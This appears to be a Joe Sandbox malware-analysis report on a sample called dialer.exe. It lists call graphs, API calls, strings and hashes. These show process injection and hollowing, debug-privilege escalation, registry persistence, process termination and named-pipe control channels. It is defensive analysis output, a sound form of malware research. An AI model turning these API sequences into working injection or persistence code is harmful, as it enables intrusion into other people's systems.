498->500 501 7ff744dd2566 RegSetKeySecurity LocalFree 499->501 502 7ff744dd2587 RegCreateKeyExW 499->502 503 7ff744dd2693 SleepEx 500->503 501->502 504 7ff744dd25c3 GetCurrentProcessId RegSetValueExW RegCloseKey 502->504 505 7ff744dd2602 RegCloseKey 502->505 503->503 504->505 505->500 507 7ff744dd2081 StrCpyW StrCatW GetModuleHandleW 506->507 508 7ff744dd2270 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 506->508 507->508 509 7ff744dd20d3 507->509 508->485 509->509 510 7ff744dd210c GetCurrentProcess K32GetModuleInformation 509->510 511 7ff744dd212e CreateFileW 510->511 512 7ff744dd2267 FreeLibrary 510->512 511->512 513 7ff744dd2163 CreateFileMappingW 511->513 512->508 514 7ff744dd218d MapViewOfFile 513->514 515 7ff744dd225e CloseHandle 513->515 516 7ff744dd2255 CloseHandle 514->516 517 7ff744dd21b1 514->517 515->512 516->515 517->516 518 7ff744dd21cc lstrcmpiA 517->518 520 7ff744dd21fd 517->520 518->517 519 7ff744dd21ff VirtualProtect 518->519 529 7ff744dd18b8 519->529 520->516 531 7ff744dd14e4 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 523->531 525 7ff744dd1891 GetProcessHeap HeapFree 526 7ff744dd183c 526->525 527 7ff744dd185d OpenProcess 526->527 527->526 528 7ff744dd1873 TerminateProcess CloseHandle 527->528 528->526 530 7ff744dd18c7 VirtualProtect 529->530 530->516 532 7ff744dd163b GetProcessHeap HeapFree GetProcessHeap HeapFree 531->532 537 7ff744dd1571 531->537 532->526 533 7ff744dd1586 OpenProcess 534 7ff744dd15a3 K32EnumProcessModules 533->534 533->537 535 7ff744dd1626 CloseHandle 534->535 534->537 535->537 536 7ff744dd15d5 ReadProcessMemory 536->537 537->532 537->533 537->535 537->536 538 7ff744dd2cc0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 539 7ff744dd2d16 K32EnumProcesses 538->539 540 7ff744dd2d76 Sleep 539->540 542 7ff744dd2d2b 539->542 540->539 541 7ff744dd2d64 541->540 542->541 544 7ff744dd26c8 542->544 545 7ff744dd26d5 544->545 546 7ff744dd26e0 544->546 547 7ff744dd10c0 30 API calls 545->547 546->542 547->546 548 7ff744dd228c 549 7ff744dd2299 548->549 550 7ff744dd1c64 6 API calls 549->550 551 7ff744dd22ae Sleep 549->551 552 7ff744dd22b9 ConnectNamedPipe 549->552 550->549 551->549 553 7ff744dd22fd Sleep 552->553 554 7ff744dd22c8 ReadFile 552->554 556 7ff744dd2308 DisconnectNamedPipe 553->556 555 7ff744dd22eb 554->555 554->556 555->556 556->552 557 7ff744dd26e8 558 7ff744dd2716 557->558 559 7ff744dd28be 557->559 560 7ff744dd271c 558->560 561 7ff744dd284a GetProcessHeap HeapAlloc K32EnumProcesses 558->561 562 7ff744dd28cc 559->562 563 7ff744dd2b0a ReadFile 559->563 566 7ff744dd2841 ExitProcess 560->566 567 7ff744dd2729 560->567 564 7ff744dd2888 561->564 614 7ff744dd27b7 561->614 568 7ff744dd28d5 562->568 569 7ff744dd2b00 562->569 565 7ff744dd2b34 563->565 563->614 577 7ff744dd10c0 30 API calls 564->577 564->614 578 7ff744dd19ac 3 API calls 565->578 565->614 573 7ff744dd27e4 RegOpenKeyExW 567->573 574 7ff744dd2732 567->574 570 7ff744dd2aa5 568->570 571 7ff744dd28e0 568->571 572 7ff744dd1768 22 API calls 569->572 581 7ff744dd1a44 ReadFile 570->581 575 7ff744dd28e5 571->575 576 7ff744dd2921 571->576 572->614 579 7ff744dd2825 573->579 580 7ff744dd2811 RegDeleteValueW 573->580 589 7ff744dd274f ReadFile 574->589 574->614 575->614 640 7ff744dd1958 575->640 643 7ff744dd1a44 576->643 577->564 584 7ff744dd2b53 578->584 627 7ff744dd1ac4 SysAllocString SysAllocString CoInitializeEx 579->627 580->579 582 7ff744dd2ab4 581->582 592 7ff744dd1a44 ReadFile 582->592 582->614 595 7ff744dd2b67 GetProcessHeap HeapAlloc 584->595 584->614 615 7ff744dd27bc 584->615 588 7ff744dd282a 635 7ff744dd1768 GetProcessHeap HeapAlloc 588->635 591 7ff744dd2779 589->591 589->614 603 7ff744dd19ac 3 API calls 591->603 591->614 597 7ff744dd2acb 592->597 594 7ff744dd2938 ReadFile 599 7ff744dd2960 594->599 594->614 600 7ff744dd14e4 13 API calls 595->600 604 7ff744dd2ad3 ShellExecuteW 597->604 597->614 606 7ff744dd296d GetProcessHeap HeapAlloc ReadFile 599->606 599->614 601 7ff744dd2ba0 600->601 608 7ff744dd2bd5 GetProcessHeap 601->608 667 7ff744dd16d8 601->667 610 7ff744dd2798 603->610 604->614 611 7ff744dd2a97 GetProcessHeap 606->611 617 7ff744dd29b1 606->617 607 7ff744dd2c18 4 API calls 607->614 613 7ff744dd2bde HeapFree 608->613 610->614 610->615 616 7ff744dd27a8 610->616 611->613 613->614 615->607 620 7ff744dd10c0 30 API calls 616->620 617->611 618 7ff744dd2a05 lstrlenW GetProcessHeap HeapAlloc 617->618 619 7ff744dd29e2 617->619 624 7ff744dd2a49 618->624 619->611 647 7ff744dd1db4 619->647 620->614 661 7ff744dd2c18 CreateFileW 624->661 628 7ff744dd1c35 SysFreeString SysFreeString 627->628 629 7ff744dd1b16 CoInitializeSecurity 627->629 628->588 630 7ff744dd1b52 629->630 631 7ff744dd1b5e CoCreateInstance 629->631 630->631 632 7ff744dd1c2f CoUninitialize 630->632 631->632 633 7ff744dd1b92 VariantInit 631->633 632->628 634 7ff744dd1be8 633->634 634->632 636 7ff744dd14e4 13 API calls 635->636 638 7ff744dd17a6 636->638 637 7ff744dd17d4 GetProcessHeap HeapFree 638->637 639 7ff744dd16d8 5 API calls 638->639 639->638 641 7ff744dd1a14 2 API calls 640->641 642 7ff744dd196d 641->642 644 7ff744dd1a68 ReadFile 643->644 645 7ff744dd1a8b 644->645 646 7ff744dd1aa5 644->646 645->644 645->646 646->594 646->614 653 7ff744dd1de0 647->653 648 7ff744dd1e3e CreateProcessW 649 7ff744dd1e86 VirtualAllocEx 648->649 648->653 650 7ff744dd1eb9 WriteProcessMemory 649->650 649->653 650->653 651 7ff744dd1fc4 OpenProcess 652 7ff744dd1fd7 TerminateProcess 651->652 651->653 652->653 653->648 653->651 654 7ff744dd1f2a VirtualAlloc 653->654 655 7ff744dd1ee4 WriteProcessMemory 653->655 660 7ff744dd1fb8 653->660 654->653 656 7ff744dd1f49 GetThreadContext 654->656 655->653 656->653 657 7ff744dd1f61 WriteProcessMemory 656->657 657->653 658 7ff744dd1f89 SetThreadContext 657->658 658->653 659 7ff744dd1fa9 ResumeThread 658->659 659->653 659->660 660->611 662 7ff744dd2c62 WriteFile 661->662 663 7ff744dd2a83 GetProcessHeap HeapFree 661->663 664 7ff744dd2ca4 CloseHandle 662->664 665 7ff744dd2c86 662->665 663->611 664->663 665->664 666 7ff744dd2c8a WriteFile 665->666 666->664 668 7ff744dd1751 667->668 669 7ff744dd16f7 OpenProcess 667->669 668->608 669->668 670 7ff744dd170f 669->670 671 7ff744dd18f8 2 API calls 670->671 672 7ff744dd172f 671->672 673 7ff744dd1748 CloseHandle 672->673 674 7ff744dd173d CloseHandle 672->674 673->668 674->673

                                                                                                      Callgraph

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeHeapModuleOpenTokenValue$AdjustAllocConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
                                                                                                      • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                                      • API String ID: 2439791646-1130149537
                                                                                                      • Opcode ID: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
                                                                                                      • Instruction ID: f94c9f37d268f2f42c4f15a63d8d1d8fe594422477c1bdf330da70fa66dae84d
                                                                                                      • Opcode Fuzzy Hash: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
                                                                                                      • Instruction Fuzzy Hash: F1A1FCB5A0CB82C6EB20BF62E8946A9B7A1FB88754F804135DE5D47768DF3CD148DB10

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 26 7ff744dd10c0-7ff744dd1110 call 7ff744dd19ac 29 7ff744dd14c5-7ff744dd14e1 26->29 30 7ff744dd1116-7ff744dd111c 26->30 30->29 31 7ff744dd1122-7ff744dd1138 OpenProcess 30->31 31->29 32 7ff744dd113e-7ff744dd115b OpenProcess 31->32 33 7ff744dd1161-7ff744dd1178 K32GetModuleFileNameExW 32->33 34 7ff744dd1208-7ff744dd1229 NtQueryInformationProcess 32->34 35 7ff744dd11aa-7ff744dd11b6 CloseHandle 33->35 36 7ff744dd117a-7ff744dd1195 PathFindFileNameW lstrlenW 33->36 37 7ff744dd122f-7ff744dd1235 34->37 38 7ff744dd14bc-7ff744dd14bf CloseHandle 34->38 35->34 40 7ff744dd11b8-7ff744dd11df 35->40 36->35 39 7ff744dd1197-7ff744dd11a7 StrCpyW 36->39 37->38 41 7ff744dd123b-7ff744dd1253 OpenProcessToken 37->41 38->29 39->35 42 7ff744dd11e3-7ff744dd11f5 StrCmpIW 40->42 41->38 43 7ff744dd1259-7ff744dd127f GetTokenInformation 41->43 42->38 44 7ff744dd11fb-7ff744dd1206 42->44 45 7ff744dd1281-7ff744dd128a GetLastError 43->45 46 7ff744dd12fc 43->46 44->34 44->42 45->46 48 7ff744dd128c-7ff744dd12a0 LocalAlloc 45->48 47 7ff744dd1303-7ff744dd1311 CloseHandle 46->47 47->38 49 7ff744dd1317-7ff744dd131e 47->49 48->46 50 7ff744dd12a2-7ff744dd12c8 GetTokenInformation 48->50 49->38 51 7ff744dd1324-7ff744dd132f 49->51 52 7ff744dd12ea 50->52 53 7ff744dd12ca-7ff744dd12e8 GetSidSubAuthorityCount GetSidSubAuthority 50->53 51->38 54 7ff744dd1335-7ff744dd133f 51->54 55 7ff744dd12f1-7ff744dd12fa LocalFree 52->55 53->55 54->38 56 7ff744dd1345-7ff744dd134f 54->56 55->47 56->38 57 7ff744dd1355-7ff744dd1395 call 7ff744dd2010 * 3 56->57 57->38 64 7ff744dd139b-7ff744dd13bb call 7ff744dd2010 StrStrA 57->64 67 7ff744dd13d3-7ff744dd13f8 call 7ff744dd2010 * 2 64->67 68 7ff744dd13bd-7ff744dd13cc 64->68 67->38 74 7ff744dd13fe-7ff744dd1425 VirtualAllocEx 67->74 68->64 69 7ff744dd13ce 68->69 69->38 74->38 75 7ff744dd142b-7ff744dd1444 WriteProcessMemory 74->75 75->38 76 7ff744dd1446-7ff744dd1468 call 7ff744dd18f8 75->76 76->38 79 7ff744dd146a-7ff744dd1472 76->79 79->38 80 7ff744dd1474-7ff744dd147a 79->80 81 7ff744dd1483-7ff744dd1490 WaitForSingleObject 80->81 82 7ff744dd147c-7ff744dd1481 80->82 83 7ff744dd14b1 81->83 84 7ff744dd1492-7ff744dd14a6 GetExitCodeThread 81->84 85 7ff744dd14b6 CloseHandle 82->85 83->85 84->83 86 7ff744dd14a8-7ff744dd14ae 84->86 85->38 86->83
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                                      • String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
                                                                                                      • API String ID: 2561231171-2835194517
                                                                                                      • Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                                                                      • Instruction ID: 54546746a18933aaa2638028530c4da895ffee3bd7c6c77edb96976f6e918c7e
                                                                                                      • Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                                                                      • Instruction Fuzzy Hash: 80B13BA1A0C642C6EF20BF12A980679A7A5FB48B85F804135CF6E47758DE3CE545EB60

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 4084875642-0
                                                                                                      • Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                                                                      • Instruction ID: ed7a03b24689ff4968f05491a5d3631c779aff961c7788db0eb47817d0dac918
                                                                                                      • Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                                                                      • Instruction Fuzzy Hash: 7251B1B2B19682CAEB60FF6398846ADA7A0FB49B85F844034DF2D47758DE3CD445DB10

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                      • String ID:
                                                                                                      • API String ID: 3197395349-0
                                                                                                      • Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                                                                      • Instruction ID: 6184a3633432929330242dabcf519c62c83de237da30becea5d50cc207249b12
                                                                                                      • Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                                                                      • Instruction Fuzzy Hash: 34417C72618A41CAEB60EF25E4807AD77A4FB48798F80013AEF5D43B98DF78D508DB50

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                      • String ID: .text$C:\Windows\System32\
                                                                                                      • API String ID: 2721474350-832442975
                                                                                                      • Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                                                                      • Instruction ID: 8607f1964464c1c01091b1a8dfbb4ad4ed88d249f5db8525f60f09865b7d8ff9
                                                                                                      • Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                                                                      • Instruction Fuzzy Hash: 33514F6570C642D2EF21BF56A89466AF7A0FB88B98F844131DF5D03798DE3CD409DB20

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                      • String ID: M$\\.\pipe\dialerchildproc64
                                                                                                      • API String ID: 2203880229-3489460547
                                                                                                      • Opcode ID: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
                                                                                                      • Instruction ID: ba3d57daac051bf243bfa3abddbbc2f4b8e4f90bba62c2324a66dc6d39bdb490
                                                                                                      • Opcode Fuzzy Hash: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
                                                                                                      • Instruction Fuzzy Hash: B61112A161C642D1FA14FF12E8943B9E360EB847A0F844234DF6A466D8CF7CE548EB60

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                      • API String ID: 2071455217-3440882674
                                                                                                      • Opcode ID: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
                                                                                                      • Instruction ID: 90abea5fc83d3c5e0df026d14a36a4fdee4a06063c6686e271abfa40e1bdb965
                                                                                                      • Opcode Fuzzy Hash: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
                                                                                                      • Instruction Fuzzy Hash: 7E01E5A1A5C642D1FE14BF12E884279E760AF45BA1F944534DF7A025D8CF7CE448AF21

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3676546796-0
                                                                                                      • Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                                                                      • Instruction ID: 8845aa840413bf38b7ad5d3db304a55859cb53e39091d92f9475bca78214b04c
                                                                                                      • Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                                                                      • Instruction Fuzzy Hash: F22192B1A0C602C6EA14FF17E49452AF6A1FB86B80F508038CF5A07768CE3DE444DF90

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1323846700-0
                                                                                                      • Opcode ID: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
                                                                                                      • Instruction ID: ce58bd3867ca54975a9415049079348999ac022cbaeefb9467028a41e7223a0a
                                                                                                      • Opcode Fuzzy Hash: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
                                                                                                      • Instruction Fuzzy Hash: F4115CA1E0D642D6EF18FF67A880169A7A1EF8DB91F888034DF1D03759DE3DD4459B10

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CloseHandleOpenWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 10462204-0
                                                                                                      • Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                                                                      • Instruction ID: 51644dd872573e2f8c14d154f90ec9829cc406e73a98d0f5874200aa17a27d13
                                                                                                      • Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                                                                      • Instruction Fuzzy Hash: 92F04961B0878382EB14AF17B484129A2A0FB8CBC1F849038EFAD4374CDE3CD4458B10

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF744DD2328: VerSetConditionMask.NTDLL ref: 00007FF744DD2397
                                                                                                        • Part of subcall function 00007FF744DD2328: VerSetConditionMask.NTDLL ref: 00007FF744DD23A8
                                                                                                        • Part of subcall function 00007FF744DD2328: VerSetConditionMask.NTDLL ref: 00007FF744DD23B9
                                                                                                        • Part of subcall function 00007FF744DD2328: VerifyVersionInfoW.KERNEL32 ref: 00007FF744DD23CC
                                                                                                        • Part of subcall function 00007FF744DD2328: GetCurrentProcessId.KERNEL32 ref: 00007FF744DD23DE
                                                                                                        • Part of subcall function 00007FF744DD2328: OpenProcess.KERNEL32 ref: 00007FF744DD23EE
                                                                                                        • Part of subcall function 00007FF744DD2328: OpenProcessToken.ADVAPI32 ref: 00007FF744DD240F
                                                                                                        • Part of subcall function 00007FF744DD2328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF744DD2429
                                                                                                        • Part of subcall function 00007FF744DD2328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF744DD246D
                                                                                                        • Part of subcall function 00007FF744DD2328: GetLastError.KERNEL32 ref: 00007FF744DD2477
                                                                                                        • Part of subcall function 00007FF744DD2328: CloseHandle.KERNELBASE ref: 00007FF744DD2480
                                                                                                        • Part of subcall function 00007FF744DD2328: FindResourceExA.KERNEL32 ref: 00007FF744DD2494
                                                                                                        • Part of subcall function 00007FF744DD2328: SizeofResource.KERNEL32 ref: 00007FF744DD24AB
                                                                                                        • Part of subcall function 00007FF744DD2328: LoadResource.KERNEL32 ref: 00007FF744DD24C4
                                                                                                        • Part of subcall function 00007FF744DD2328: LockResource.KERNEL32 ref: 00007FF744DD24D6
                                                                                                        • Part of subcall function 00007FF744DD2328: GetCurrentProcessId.KERNEL32 ref: 00007FF744DD24E3
                                                                                                      • ExitProcess.KERNEL32 ref: 00007FF744DD231F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 2329183550-0
                                                                                                      • Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
                                                                                                      • Instruction ID: 0ff292d4c4da59528f3002a8048f89289706b8a14240f301073b5da1d0ace4b3
                                                                                                      • Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
                                                                                                      • Instruction Fuzzy Hash: 37A01240E0C143C2ED043F72148502C80601F45201BC00434C51501145CD1C20041B31

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
